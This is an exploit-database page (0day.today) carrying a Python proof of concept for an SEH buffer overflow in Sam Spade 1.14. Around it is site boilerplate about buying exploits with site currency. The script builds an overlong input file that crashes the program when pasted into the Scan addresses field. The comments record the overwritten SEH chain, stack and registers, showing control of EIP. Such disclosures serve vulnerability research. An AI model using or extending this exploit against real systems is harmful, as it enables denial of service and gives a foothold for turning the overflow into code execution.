0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC

Author

Luis Martínez

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : Sam Spade 1.14 Scan from IP address Field SEH Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email         : l4m5@hotmail.com
# Discovery Date    : 20/10/2015
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version    : 1.14
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Crash Point       : Go to Tools > Scan addresses field > Enter the contents of 'samspade_1.14_BoF.txt' > OK
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this: 
# 0012EBE0 43434343
# 42424242 *** CORRUPT ENTRY ***
  
# And the Stack
  
#0012EBD0   41414141  AAAA
#0012EBD4   41414141  AAAA
#0012EBD8   41414141  AAAA
#0012EBDC   41414141  AAAA
#0012EBE0   42424242  BBBB  Pointer to next SEH record
#0012EBE4   43434343  CCCC  SE handler
  
# And the Registers
  
#EAX 00000001
#ECX 00000001
#EDX 00140608
#EBX 00000000
#ESP 0012EBD0 ASCII "AAAAAAAAAAAAAAAABBBBCCCC - "
#EBP 41414141
#ESI 00C2BD00
#EDI 00E89DB0
#EIP 41414141
 
buffer = "\x41" * 531
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("samspade_1.14_BoF.txt", "w")
f.write(buffer+nseh+seh)
f.close()

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC

Report Error

Report Error